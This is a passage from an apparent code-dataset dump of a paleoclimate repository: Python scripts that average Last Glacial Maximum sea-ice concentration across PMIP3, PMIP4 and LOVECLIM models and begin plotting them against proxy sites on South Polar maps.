STD\nvar1=(MMM_sum.CCSM4-MMM_sum_mean)**2\nvar2=(MMM_sum.GISS-MMM_sum_mean)**2\nvar3=(MMM_sum.MPI-MMM_sum_mean)**2\nvar4=(MMM_sum.CNRM-MMM_sum_mean)**2\nvar5=(MMM_sum.FGOALS-MMM_sum_mean)**2\nvar6=(MMM_sum.IPSL-MMM_sum_mean)**2\nvar7=(MMM_sum.MIROC-MMM_sum_mean)**2\nvar8=(MMM_sum.MRI-MMM_sum_mean)**2\nSTD=((var1+var2+var3+var4+var5+var6+var7+var8)/8)**0.5\nSTD2=(MMM_sum_mean+STD)\nSTD3=(MMM_sum_mean-STD)\n\nMMM_summer_PMIP3 = MMM_sum_mean\nSTD_MMM_summer_PMIP3 = STD2\nMMM_summer_PMIP3_STD = STD3\n\nMMM_summer_PMIP3 = MMM_summer_PMIP3.to_dataset(name='sic')\nMMM_summer_PMIP3.to_netcdf(\"MMM_STD/PMIP3_summer_MMM.nc\")\n\nSTD_MMM_summer_PMIP3 = STD_MMM_summer_PMIP3.to_dataset(name='sic')\nSTD_MMM_summer_PMIP3.to_netcdf(\"MMM_STD/PMIP3_summer_STD_MMM.nc\")\n\nMMM_summer_PMIP3_STD = 
MMM_summer_PMIP3_STD.to_dataset(name='sic')\nMMM_summer_PMIP3_STD.to_netcdf(\"MMM_STD/PMIP3_summer_MMM_STD.nc\")\n\n# austral winter\nMMM_CCSM4 = (MMM_win.CCSM4R2 + MMM_win.CCSM4R1)/2\nMMM_GISS = (MMM_win.GISSP150 + MMM_win.GISSP151)/2\nMMM_MPI = (MMM_win.MPIP1 + MMM_win.MPIP2)/2\nMMM_win['CCSM4'] = MMM_CCSM4\nMMM_win['GISS'] = MMM_GISS\nMMM_win['MPI'] = MMM_MPI\nMMM_win = MMM_win.drop_vars('CCSM4R1')\nMMM_win = MMM_win.drop_vars('CCSM4R2')\nMMM_win = MMM_win.drop_vars('GISSP150')\nMMM_win = MMM_win.drop_vars('GISSP151')\nMMM_win = MMM_win.drop_vars('MPIP1')\nMMM_win = MMM_win.drop_vars('MPIP2')\nMMM_LOVE1_win_3 = LOVE1_win_3*100\nMMM_LOVE2_win_3 = LOVE2_win_3*100\n\n# multi model mean\nMMM_win_mean = (MMM_win.CNRM + MMM_win.FGOALS + MMM_win.IPSL + MMM_win.MIROC + MMM_win.MRI + MMM_win.CCSM4 + MMM_win.MPI + MMM_win.GISS)/8\n\n# calculating STD\nvar1=(MMM_win.CCSM4-MMM_win_mean)**2\nvar2=(MMM_win.GISS-MMM_win_mean)**2\nvar3=(MMM_win.MPI-MMM_win_mean)**2\nvar4=(MMM_win.CNRM-MMM_win_mean)**2\nvar5=(MMM_win.FGOALS-MMM_win_mean)**2\nvar6=(MMM_win.IPSL-MMM_win_mean)**2\nvar7=(MMM_win.MIROC-MMM_win_mean)**2\nvar8=(MMM_win.MRI-MMM_win_mean)**2\nSTD=((var1+var2+var3+var4+var5+var6+var7+var8)/8)**0.5\nSTD4=(MMM_win_mean+STD)\nSTD5=(MMM_win_mean-STD)\n\nMMM_winter_PMIP3 = MMM_win_mean\nSTD_MMM_winter_PMIP3 = STD4\nMMM_winter_PMIP3_STD = STD5\n\nMMM_winter_PMIP3 = MMM_winter_PMIP3.to_dataset(name='sic')\nMMM_winter_PMIP3.to_netcdf(\"MMM_STD/PMIP3_winter_MMM.nc\")\n\nSTD_MMM_winter_PMIP3 = STD_MMM_winter_PMIP3.to_dataset(name='sic')\nSTD_MMM_winter_PMIP3.to_netcdf(\"MMM_STD/PMIP3_winter_STD_MMM.nc\")\n\nMMM_winter_PMIP3_STD = MMM_winter_PMIP3_STD.to_dataset(name='sic')\nMMM_winter_PMIP3_STD.to_netcdf(\"MMM_STD/PMIP3_winter_MMM_STD.nc\")\n\n####### LOVECLIM sensitivity #####\n\n#austral summer\n\nMMM = (MMM_LOVE2_sum_3 + MMM_LOVE1_sum_3)/2\nvar1 = (MMM_LOVE1_sum_3 - MMM)**2\nvar2 = (MMM_LOVE2_sum_3 - MMM)**2\nSTD = ((var1+var2)/2)**0.5\nSTD1 = (MMM+STD)\nSTD2 = (MMM-STD)\n\nMMM_summer_LOVE = MMM\nSTD_MMM_summer_LOVE = STD1\nMMM_summer_LOVE_STD = STD2\n\nMMM_summer_LOVE = MMM_summer_LOVE.to_dataset(name='sic')\nMMM_summer_LOVE.to_netcdf(\"MMM_STD/LOVE_summer_MMM.nc\")\n\nSTD_MMM_summer_LOVE = STD_MMM_summer_LOVE.to_dataset(name='sic')\nSTD_MMM_summer_LOVE.to_netcdf(\"MMM_STD/LOVE_summer_STD_MMM.nc\")\n\nMMM_summer_LOVE_STD = MMM_summer_LOVE_STD.to_dataset(name='sic')\nMMM_summer_LOVE_STD.to_netcdf(\"MMM_STD/LOVE_summer_MMM_STD.nc\")\n\nMMM = (MMM_LOVE1_win_3 + MMM_LOVE2_win_3 )/2\nvar1 = (MMM_LOVE1_win_3 - MMM)**2\nvar2 = (MMM_LOVE2_win_3 - MMM)**2\nSTD = ((var1+var2)/2)**0.5\nSTD1 = (MMM+STD)\nSTD2 = (MMM-STD)\n\nMMM_winter_LOVE = MMM\nSTD_MMM_winter_LOVE = STD1\nMMM_winter_LOVE_STD = STD2\n\nMMM_winter_LOVE = MMM_winter_LOVE.to_dataset(name='sic')\nMMM_winter_LOVE.to_netcdf(\"MMM_STD/LOVE_winter_MMM.nc\")\n\nSTD_MMM_winter_LOVE = STD_MMM_winter_LOVE.to_dataset(name='sic')\nSTD_MMM_winter_LOVE.to_netcdf(\"MMM_STD/LOVE_winter_STD_MMM.nc\")\n\nMMM_winter_LOVE_STD = MMM_winter_LOVE_STD.to_dataset(name='sic')\nMMM_winter_LOVE_STD.to_netcdf(\"MMM_STD/LOVE_winter_MMM_STD.nc\")\n\n#### PMIP4 ########\n\nMMM_summer_mean = 
(CCSM4UoT_summer.siconc+CESM12_summer.IFRAC*100+LOVEsummer+AWI_summer.siconca+MPI_summer.siconc+MIROC_summer.siconc+IPSL_summer.fract_sic*100)/7\nvar1=(CCSM4UoT_summer.siconc-MMM_summer_mean)**2\nvar2=(CESM12_summer.IFRAC*100-MMM_summer_mean)**2\nvar3=(AWI_summer.siconca-MMM_summer_mean)**2\nvar4=(MPI_summer.siconc-MMM_summer_mean)**2\nvar5=(MIROC_summer.siconc-MMM_summer_mean)**2\nvar6=(IPSL_summer.fract_sic*100-MMM_summer_mean)**2\nvar7=(LOVEsummer-MMM_summer_mean)**2\nSTD=((var1+var2+var3+var4+var5+var6+var7)/7)**0.5\nSTD2=(MMM_summer_mean+STD)\nSTD3=(MMM_summer_mean-STD)\n\nMMM_summer_PMIP4 = MMM_summer_mean\nSTD_MMM_summer_PMIP4 = STD2\nMMM_summer_PMIP4_STD = STD3\n\nMMM_summer_PMIP4 = MMM_summer_PMIP4.to_dataset(name='sic')\nMMM_summer_PMIP4.to_netcdf(\"MMM_STD/PMIP4_summer_MMM.nc\")\n\nSTD_MMM_summer_PMIP4 = STD_MMM_summer_PMIP4.to_dataset(name='sic')\nSTD_MMM_summer_PMIP4.to_netcdf(\"MMM_STD/PMIP4_summer_STD_MMM.nc\")\n\nMMM_summer_PMIP4_STD = MMM_summer_PMIP4_STD.to_dataset(name='sic')\nMMM_summer_PMIP4_STD.to_netcdf(\"MMM_STD/PMIP4_summer_MMM_STD.nc\")\n\n\nMMM_winter_mean = (CCSM4UoT_winter.siconc+CESM12_winter.IFRAC*100+LOVEwinter+AWI_winter.siconca+MPI_winter.siconc+MIROC_winter.siconc+IPSL_winter.fract_sic*100)/7\nvar1=(CCSM4UoT_winter.siconc-MMM_winter_mean)**2\nvar2=(CESM12_winter.IFRAC*100-MMM_winter_mean)**2\nvar3=(AWI_winter.siconca-MMM_winter_mean)**2\nvar4=(MPI_winter.siconc-MMM_winter_mean)**2\nvar5=(MIROC_winter.siconc-MMM_winter_mean)**2\nvar6=(IPSL_winter.fract_sic*100-MMM_winter_mean)**2\nvar7=(LOVEwinter-MMM_winter_mean)**2\nSTD=((var1+var2+var3+var4+var5+var6+var7)/7)**0.5\nSTD2=(MMM_winter_mean+STD)\nSTD3=(MMM_winter_mean-STD)\n\nMMM_winter_PMIP4 = MMM_winter_mean\nSTD_MMM_winter_PMIP4 = STD2\nMMM_winter_PMIP4_STD = STD3\n\nMMM_winter_PMIP4 = MMM_winter_PMIP4.to_dataset(name='sic')\nMMM_winter_PMIP4.to_netcdf(\"MMM_STD/PMIP4_winter_MMM.nc\")\n\nSTD_MMM_winter_PMIP4 = STD_MMM_winter_PMIP4.to_dataset(name='sic')\nSTD_MMM_winter_PMIP4.to_netcdf(\"MMM_STD/PMIP4_winter_STD_MMM.nc\")\n\nMMM_winter_PMIP4_STD = MMM_winter_PMIP4_STD.to_dataset(name='sic')\nMMM_winter_PMIP4_STD.to_netcdf(\"MMM_STD/PMIP4_winter_MMM_STD.nc\")\n"
},
{
"alpha_fraction": 0.5678853392601013,
"alphanum_fraction": 0.6950233578681946,
"avg_line_length": 62.35714340209961,
"blob_id": "5c7e5e1091c675cbec8bbefca2d2b0de4a5b7b21",
"content_id": "3a52b64aba834add8095ca0590d118a48480eab1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 31045,
"license_type": "no_license",
"max_line_length": 869,
"num_lines": 490,
"path": "/Figure1.py",
"repo_name": "RyanAGreen/PMIP_seaice",
"src_encoding": "UTF-8",
"text": "# two columns PMIP\nimport numpy as np\nfrom matplotlib import pyplot as plt\nimport pandas as pd\n#%matplotlib inline\nimport xarray as xr\nimport cartopy.crs as ccrs\nimport cartopy\nimport cartopy.feature as cfeature\nimport matplotlib.ticker as mticker\nfrom cartopy.mpl.gridliner import LONGITUDE_FORMATTER, LATITUDE_FORMATTER\nimport matplotlib.path as mpath\nimport matplotlib.lines as mlines\n\n# load in PMIP3 data\nCNRM_3 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/sic_OIclim_CNRM-CM5_lgm_r1i1p1_180001-199912-climregrid.nc',decode_times=False)\nFGOALS_3 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/sic_OIclim_FGOALS-g2_lgm_r1i1p1_055001-064912-climregrid.nc',decode_times=False)\nIPSL_3 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/sic_OIclim_IPSL-CM5A-LR_lgm_r1i1p1_260101-280012-climregrid.nc',decode_times=False)\nMIROC_3 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/sic_OIclim_MIROC-ESM_lgm_r1i1p1_460001-469912-climregrid.nc',decode_times=False)\nMRI_3 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/sic_OIclim_MRI-CGCM3_lgm_r1i1p1_250101-260012-climregrid.nc',decode_times=False)\n\nLOVE1_sum_3 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/LOVE1_albq_summer.nc',decode_times=False) # check if this is loveclim1 or 2\nfeb = LOVE1_sum_3.FEB.mean(dim='AX005')\nmar = LOVE1_sum_3.MAR.mean(dim='AX006')\nLOVE1_sum_3 = (mar + feb)/2\n\nLOVE1_win_3 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/V3LNAwSeaIceConcWinter.nc',decode_times=False) # check if this is loveclim1 or 2\njul = LOVE1_win_3.ALJUL.mean(dim='AX007')\naug2 = LOVE1_win_3.ALAUG.mean(dim='AX008')\nLOVE1_win_3 = (jul + aug2)/2\n\n#### Summer\n\n# data sets with preset variables\nCCSM4_sum_3 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/2MonthMinimum-sic-CCSM4_lgm.nc',decode_times=False)\nCCSM4_sum_3 = (CCSM4_sum_3.S1A + CCSM4_sum_3.S1B)/2\nGISS_sum_3 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/2MonthMinimum-sic-GISS_lgm.nc',decode_times=False)\nGISS_sum_3 = (GISS_sum_3.S2A + GISS_sum_3.S2B)/2\nMPI_sum_3 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/2MonthMinimum-sic-MPI_lgm.nc',decode_times=False)\nMPI_sum_3 = (MPI_sum_3.S3A + MPI_sum_3.S3B)/2\n\n\n# original data file that has 12 time points\nCNRM_3_sum = xr.concat([CNRM_3.sel(time=(CNRM_3.time[1])), CNRM_3.sel(time=(CNRM_3.time[2]))], dim=\"time\")\nCNRM_3_sum = CNRM_3_sum.mean(dim='time') # or whatever the time axis is called for this variable (different for loveclim)\nFGOALS_3_sum = xr.concat([FGOALS_3.sel(time=(FGOALS_3.time[2])), FGOALS_3.sel(time=(FGOALS_3.time[3]))], dim=\"time\")\nFGOALS_3_sum = FGOALS_3_sum.mean(dim='time')\nIPSL_3_sum = xr.concat([IPSL_3.sel(time=(IPSL_3.time[1])), IPSL_3.sel(time=(IPSL_3.time[2]))], dim=\"time\")\nIPSL_3_sum = IPSL_3_sum.mean(dim='time')\nMIROC_3_sum = xr.concat([MIROC_3.sel(time=(MIROC_3.time[1])), MIROC_3.sel(time=(MIROC_3.time[2]))], dim=\"time\")\nMIROC_3_sum = MIROC_3_sum.mean(dim='time')\nMRI_3_sum = xr.concat([MRI_3.sel(time=(MRI_3.time[1])), MRI_3.sel(time=(MRI_3.time[2]))], dim=\"time\")\nMRI_3_sum = MRI_3_sum.mean(dim='time')\nLOVE2_sum_3 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/V3LNAwSOwSHWwSeaIceConcSUMMER.nc',decode_times=False) # check if this is loveclim1 or 2\naug = LOVE2_sum_3.ALFEB.mean(dim='AX005')\nsep = LOVE2_sum_3.ALMAR.mean(dim='AX006')\nLOVE2_sum_3 = (aug + sep)/2\n\n\n\n# Multi model mean\nMMM_sum = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/AnnualMinimum15%.nc',decode_times=False)\n\n#### Winter\n\n# data sets with preset variables\n\nCCSM4_win_3 = 
xr.open_dataset('~/Desktop/UNSW/PMIP4Models/2MonthMaximum-sic-CCSM4_lgm.nc',decode_times=False)\nCCSM4_win_3 = (CCSM4_win_3.S1A + CCSM4_win_3.S1B)/2\nGISS_win_3 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/2MonthMaximum-sic-GISS_lgm.nc',decode_times=False)\nGISS_win_3 = (GISS_win_3.S2A + GISS_win_3.S2B)/2\nGISS_win_3 = GISS_win_3.isel(LAT=(GISS_win_3.LAT > -70))\nMPI_win_3 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/2MonthMaximum-sic-MPI_lgm.nc',decode_times=False)\nMPI_win_3 = (MPI_win_3.S3A + MPI_win_3.S3B)/2\n\n\n# original data file that has 12 time points\nCNRM_3_win = xr.concat([CNRM_3.sel(time=(CNRM_3.time[8])), CNRM_3.sel(time=(CNRM_3.time[9]))], dim=\"time\")\nCNRM_3_win = CNRM_3_win.mean(dim='time') # or whatever the time axis is called for this variable (different for loveclim)\nFGOALS_3_win = xr.concat([FGOALS_3.sel(time=(FGOALS_3.time[8])), FGOALS_3.sel(time=(FGOALS_3.time[9]))], dim=\"time\")\nFGOALS_3_win = FGOALS_3_win.mean(dim='time')\nFGOALS_3_win = FGOALS_3_win.isel(lat=(FGOALS_3_win.lat > -70))\nIPSL_3_win = xr.concat([IPSL_3.sel(time=(IPSL_3.time[7])), IPSL_3.sel(time=(IPSL_3.time[8]))], dim=\"time\")\nIPSL_3_win = IPSL_3_win.mean(dim='time')\nMIROC_3_win = xr.concat([MIROC_3.sel(time=(MIROC_3.time[8])), MIROC_3.sel(time=(MIROC_3.time[9]))], dim=\"time\")\nMIROC_3_win = MIROC_3_win.mean(dim='time')\nMRI_3_win = xr.concat([MRI_3.sel(time=(MRI_3.time[8])), MRI_3.sel(time=(MRI_3.time[9]))], dim=\"time\")\nMRI_3_win = MRI_3_win.mean(dim='time')\nMRI_3_win = MRI_3_win.isel(lat=(MRI_3_win.lat > -70))\nLOVE2_win_3 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/V3LNAwSOwSHWwSeaIceConcWINTER.nc',decode_times=False) # check if this is loveclim1 or 2\naug = LOVE2_win_3.ALAUG.mean(dim='AX005')\nsep = LOVE2_win_3.ALSEP.mean(dim='AX006')\nLOVE2_win_3 = (aug + sep)/2\n\n\n# Multi model mean winter\nMMM_win = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/AnnualMaximum15%.nc',decode_times=False)\n\n# load in PMIP4 data\n\niLOVECLIM = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/PMIP4seaice/cresum18250_regrid.nc',decode_times=False)\nLOVEsic = iLOVECLIM.albq\nfeb = LOVEsic[1:2400:12]\nmar = LOVEsic[2:2400:12]\naug = LOVEsic[7:2400:12]\nsep = LOVEsic[8:2400:12]\nmar = mar.mean(dim='time')\nfeb = feb.mean(dim='time')\nsep = sep.mean(dim='time')\naug = aug.mean(dim='time')\nLOVEsummer = (mar+feb)/2\nLOVEwinter = (sep + aug)/2\nLOVEsummer = LOVEsummer * 100\nLOVEwinter = LOVEwinter * 100\n\n\nAWI = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/PMIP4seaice/AWI_PMIP4_siconca_regrid.nc',decode_times=False)\nMIROC = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/PMIP4seaice/MIROC_PMIP4_siconc_regrid.nc',decode_times=False)\nMPI = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/PMIP4seaice/MPIPMIP4_siconc_regrid.nc',decode_times=False)\nCESM12 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/PMIP4seaice/b.e12.B1850C5.f19_g16.i21ka.03.pop.h.vars.08010900.climo_regrid.nc',decode_times=False)\nCCSM4UoT = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/PMIP4seaice/siconc_SImon_UofT-CCSM4_lgm_r1i1p1f1_gn_110101-120012_regrid.nc',decode_times=False)\nIPSL = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/PMIP4seaice/IPSLCM5A2_LGM_regrid.nc',decode_times=False)\n\n\n# datasets that need to be averaged over 2 month period\nAWI_winter = xr.concat([AWI.sel(time=(AWI.time[7::12])), AWI.sel(time=(AWI.time[8::12]))], dim=\"time\") # August September\nAWI_winter = AWI_winter.mean(dim='time')\nAWI_winter = AWI_winter.isel(lat=(AWI_winter.lat > -70))\nAWI_summer = xr.concat([AWI.sel(time=(AWI.time[1::12])), 
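# one calendar month per model year is picked by each 12-step stride\n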
AWI.sel(time=(AWI.time[2::12]))], dim=\"time\") # Feb March\nAWI_summer = AWI_summer.mean(dim='time')\n\nMIROC_winter = xr.concat([MIROC.sel(time=(MIROC.time[8::12])), MIROC.sel(time=(MIROC.time[9::12]))], dim=\"time\") # Sep october\nMIROC_winter = MIROC_winter.mean(dim='time')\nMIROC_summer = xr.concat([MIROC.sel(time=(MIROC.time[1::12])), MIROC.sel(time=(MIROC.time[2::12]))], dim=\"time\") # Feb march\nMIROC_summer = MIROC_summer.mean(dim='time')\n\nMPI_winter = xr.concat([MPI.sel(time=(MPI.time[8::12])), MPI.sel(time=(MPI.time[9::12]))], dim=\"time\")\nMPI_winter = MPI_winter.mean(dim='time')\nMPI_summer = xr.concat([MPI.sel(time=(MPI.time[1::12])), MPI.sel(time=(MPI.time[2::12]))], dim=\"time\")\nMPI_summer = MPI_summer.mean(dim='time')\n\nCESM12_winter = xr.concat([CESM12.sel(time=(CESM12.time[7])), CESM12.sel(time=(CESM12.time[8]))], dim=\"time\")\nCESM12_winter = CESM12_winter.mean(dim='time')\nCESM12_summer = xr.concat([CESM12.sel(time=(CESM12.time[1])), CESM12.sel(time=(CESM12.time[2]))], dim=\"time\")\nCESM12_summer = CESM12_summer.mean(dim='time')\n\nCCSM4UoT_winter = xr.concat([CCSM4UoT.sel(time=(CCSM4UoT.time[8::12])), CCSM4UoT.sel(time=(CCSM4UoT.time[9::12]))], dim=\"time\")\nCCSM4UoT_winter = CCSM4UoT_winter.mean(dim='time')\nCCSM4UoT_summer = xr.concat([CCSM4UoT.sel(time=(CCSM4UoT.time[2::12])), CCSM4UoT.sel(time=(CCSM4UoT.time[3::12]))], dim=\"time\")\nCCSM4UoT_summer = CCSM4UoT_summer.mean(dim='time')\n\nIPSL_winter = xr.concat([IPSL.sel(time_counter=(IPSL.time_counter[7])), IPSL.sel(time_counter=(IPSL.time_counter[8]))], dim=\"time_counter\") # August September\nIPSL_winter = IPSL_winter.mean(dim='time_counter')\nIPSL_winter = IPSL_winter.isel(lat=(IPSL_winter.lat > -70))\nIPSL_summer = xr.concat([IPSL.sel(time_counter=(IPSL.time_counter[1])), IPSL.sel(time_counter=(IPSL.time_counter[2]))], dim=\"time_counter\") # Feb March\nIPSL_summer = IPSL_summer.mean(dim='time_counter')\n\n# proxy data points for Summer\nnoSSIlat = [-57.02,-63.08,-60.22,-61.24,-56.9,-57.83,-56.06,-54.91,-62.16,-58.68,-59.97,-59.02,-45.1,-53.93,-52.6,-53.55,-55.55,-55.14,-56.74,-59.79,-59.79,-60.3,-59.05,-58.72,-54.64,-47.9,-50.25,-54.91,-56.84,-55.97,-59.23,-55.19,-57.57,-58.85,-53.05,-46.51,-51.7,-44.15,-50.4,-49.01,-48.23,-37.27,-50.95,-42.88,-53.07,-53.88,-43.17,-53.18,-52.63,-54.91,-53.63,-52.59,-51.98,-51.83,-53.66,-53.17,-53.18,-53.18,-53.19,-50.16,-49.98,-44.96,-46.94,-48.9,-46.6,-42.87,-55.37,-42.52,-43.22,-47.54,-52.02,-45.73,-43.7,-49.1,-43.85,-41.86,-49.57,-56.57,-44.56,-46.14,-58.99,-50.69,-53.23,-51.88,-42.88,-51.91,-55.01,-43.7,-49,-38,-43.49,-54.48,-44.98,-52.2,-38.75,-50.47,-50.32,-48.89,-55.33,-51.06,-50.37,-37.8,-55,-54.91,-38.54,-46.06,-46.02,-55.95,-44.88,-52.9,-51.01,-55.07,-53.04,-53.5,-52.48,-53.44,-45.06,-52.94,-47.77,-45.01,-48.86,-48.03,-54.19,-56.38,-60.39,-56.67]\nnoSSIlon = 
[-160.09,-135.12,-127.03,-116.05,-115.24,-115.21,-115.06,-114.7,-109.09,-108.8,-101.32,-99.76,-57.95,-48.04,-46.88,-45.29,-45.02,-44.11,-42.97,-42.68,-39.6,-36.65,-35.61,-33.04,-23.95,-23.7,-23.24,-22.71,-22.32,-22.22,-19.73,-18.61,-17.1,-16.65,-16.45,-15.33,-15.3,-14.23,-14.08,-12.7,-11.04,-10.1,-7.51,-6.02,-4.99,-4.93,-4.06,-0.35,-0.13,3.31,3.86,4.48,4.52,4.81,5.1,5.11,5.13,5.13,5.33,5.72,5.87,5.97,6.26,6.71,7.63,8.92,9.98,11.67,11.74,15.36,20.47,25.65,25.73,27.38,27.6,28.54,30.02,34.18,34.79,35.9,37.63,40.13,40.8,41.65,42.35,42.88,45.01,45.06,45.21,51.18,51.32,53.05,53.28,54.47,59.3,59.58,61.2,61.66,65.47,67.72,68.39,71.53,73.26,73.84,79.87,90.09,96.43,104.95,106.52,109.85,109.99,110.02,110.05,111.33,114.09,114.26,114.37,116.99,123.1,125.98,126.02,126.13,144.79,145.3,157.53,160.23]\nSSIlat = [-50.87,-53.80,-54.09,-62.49,-63.65,-64.67]\nSSIlon = [-9.87,-8.22,-0.35,95.89,101.15,119.51]\nmaybeSSIlat = [-59.79,-60.30,-53.88,-53.18,-53.63,-53.17,-52.02]\nmaybeSSIlon = [-39.60,-36.65,-4.93,-0.35, 3.86, 5.11,20.47]\n\n# proxy data points for winter\nnoWSIlat = [-58.55,-59.70,-60.87,-59.04,-55.53,-60.22,-54.22,-56.90,-56.06,-55.16,-54.91,-58.68,-52.81,-59.97,-59.02,-45.10,-56.84,-55.97,-46.51,-44.15,-50.40,-49.01,-48.23,-37.27,-42.88,-43.17,-50.16,-44.96,-46.94,-48.90,-46.60,-42.87,-42.52,-43.22,-47.54,-45.73,-43.70,-43.85,-41.86,-44.56,-46.14,-42.88,-43.70,-49.00,-38.00,-43.49,-44.98,-38.75,-48.89,-37.80,-38.54,-46.06,-46.02,-44.88,-45.06,-52.94,-47.77,-45.01,-48.86,-48.03]\nnoWSIlon = [-172.70,-171.36,-169.55,-158.36,-156.14,-127.03,-125.43,-115.24,-115.06,-114.79,-114.70,-108.80,-107.81,-101.32,-99.76,-57.95,-22.32,-22.22,-15.33,-14.23,-14.08,-12.70,-11.04,-10.10,-6.02,-4.06,5.72,5.97,6.26,6.71,7.63,8.92,11.67,11.74,15.36,25.65,25.73,27.60,28.54,34.79,35.90,42.35,45.06,45.21,51.18,51.32,53.28,59.30,61.66,71.53,79.87,90.09,96.43,106.52,114.37,116.99,123.10,125.98,126.02,126.13]\nWSIlat = [-63.69,-61.94,-57.02,-57.20,-57.56,-61.01,-63.08,-62.03,-61.24,-57.83,-56.15,-59.21,-62.16,-53.93,-52.60,-53.55,-55.55,-55.14,-56.74,-59.79,-59.79,-60.30,-59.05,-58.72,-54.64,-47.90,-50.25,-54.91,-59.23,-55.19,-57.57,-58.85,-53.05,-51.70,-50.87,-53.80,-50.95,-53.07,-53.88,-54.09,-53.18,-52.63,-54.91,-53.63,-52.59,-51.98,-51.83,-53.66,-53.17,-53.18,-53.18,-53.19,-49.98,-55.37,-52.02,-49.10,-49.57,-56.57,-58.99,-50.69,-53.23,-51.88,-51.91,-55.01,-54.48,-52.20,-50.47,-50.32,-55.33,-51.06,-50.37,-55.00,-54.91,-62.49,-63.65,-55.95,-52.90,-51.01,-55.07,-53.04,-53.50,-52.48,-53.44,-64.67,-54.19,-56.38,-59.62,-60.39,-56.67]\nWSIlon = [-169.07,-160.12,-160.09,-151.61,-151.22,-139.46,-135.12,-116.12,-116.05,-115.21,-115.13,-114.89,-109.09,-48.04,-46.88,-45.29,-45.02,-44.11,-42.97,-42.68,-39.60,-36.65,-35.61,-33.04,-23.95,-23.70,-23.24,-22.71,-19.73,-18.61,-17.10,-16.65,-16.45,-15.30,-9.87,-8.22,-7.51,-4.99,-4.93,-0.35,-0.35,-0.13,3.31,3.86,4.48,4.52,4.81,5.10,5.11,5.13,5.13,5.33,5.87,9.98,20.47,27.38,30.02,34.18,37.63,40.13,40.80,41.65,42.88,45.01,53.05,54.47,59.58,61.20,65.47,67.72,68.39,73.26,73.84,95.89,101.15,104.95,109.85,109.99,110.02,110.05,111.33,114.09,114.26,119.51,144.79,145.30,155.24,157.53,160.23]\nmaybeWSIlat = [-59.04,-55.53,-56.84,-55.97,-50.40,-50.16,-47.45,-43.70,-49.00]\nmaybeWSIlon = [-158.36,-156.14,-22.32,-22.22,-14.08,5.72,15.36,45.06,45.21]\n\n# proxy line from\nproxyline = pd.read_excel('~/Downloads/Table_LGM_SI_Zenedo (1).xlsx',engine=\"openpyxl\")\nWSI = proxyline[[\"Longitude\", \"Latitude WSI\"]]\nSSI = proxyline[[\"Longitude\", \"Latitude SSI\"]]\nWSI = WSI[1:361]\nSSI = SSI[1:361]\nWSI = 
WSI.rename(columns={\"Latitude WSI\": \"Latitude\"})\nSSI = SSI.rename(columns={\"Latitude SSI\": \"Latitude\"})\n\n\nnrows=4\nncols=4\nextent = [-180, 180, -90, -30]\n\nfig, ax = plt.subplots(nrows=nrows,ncols=ncols,\n subplot_kw={'projection': ccrs.SouthPolarStereo()},\n figsize=(15.5,16))\nplt.rcParams['font.sans-serif'] = 'Arial'\nplt.rcParams[\"font.weight\"] = \"bold\"\nax=ax.flatten()\ntheta = np.linspace(0, 2*np.pi, 100)\ncenter, radius = [0.5, 0.5], 0.5\nverts = np.vstack([np.sin(theta), np.cos(theta)]).T\ncircle = mpath.Path(verts * radius + center)\n\n#setting up first three rows\nfor n in range(10):\n ax[n].set_boundary(circle, transform=ax[n].transAxes)\n ax[n].gridlines(linestyle='--',zorder=4)\n ax[n].set_extent(extent, crs=ccrs.PlateCarree())\n ax[n].coastlines(zorder=4)\n\n# Adding summer proxy data\nfor n in range(0,10,2):\n ax[n].plot([noSSIlon], [noSSIlat],color='red', marker='o',markersize=1.5,transform=ccrs.PlateCarree())\n ax[n].plot([SSIlon], [SSIlat],color='blue', marker='o',markersize=1.5,transform=ccrs.PlateCarree())\n ax[n].plot([maybeSSIlon], [maybeSSIlat],color='black', marker='o',markersize=1.5,transform=ccrs.PlateCarree())\n\n# adding winter proxy data\nfor n in range(1,10,2):\n ax[n].plot([noWSIlon], [noWSIlat],color='red', marker='o',markersize=1.5,transform=ccrs.PlateCarree())\n ax[n].plot([WSIlon], [WSIlat],color='blue', marker='o',markersize=1.5,transform=ccrs.PlateCarree())\n ax[n].plot([maybeWSIlon], [maybeWSIlat],color='black', marker='o',markersize=1.5,transform=ccrs.PlateCarree())\n\n# because skipping bottom right, setting up fourth row\nfor n in range(12,14):\n ax[n].set_boundary(circle, transform=ax[n].transAxes)\n ax[n].gridlines(linestyle='--',zorder=4)\n ax[n].set_extent(extent, crs=ccrs.PlateCarree())\n ax[n].coastlines(zorder=4)\n\nfor n in range(12,14):\n ax[n].set_boundary(circle, transform=ax[n].transAxes)\n ax[n].gridlines(linestyle='--',zorder=4)\n ax[n].set_extent(extent, crs=ccrs.PlateCarree())\n ax[n].coastlines(zorder=4)\n\n# Adding summer proxy data\nfor n in range(12,13):\n ax[n].plot([noSSIlon], [noSSIlat],color='red', marker='o',markersize=1.5,transform=ccrs.PlateCarree())\n ax[n].plot([SSIlon], [SSIlat],color='blue', marker='o',markersize=1.5,transform=ccrs.PlateCarree())\n ax[n].plot([maybeSSIlon], [maybeSSIlat],color='black', marker='o',markersize=1.5,transform=ccrs.PlateCarree())\n\n# adding winter proxy data\nfor n in range(13,14):\n ax[n].plot([noWSIlon], [noWSIlat],color='red', marker='o',markersize=1.5,transform=ccrs.PlateCarree())\n ax[n].plot([WSIlon], [WSIlat],color='blue', 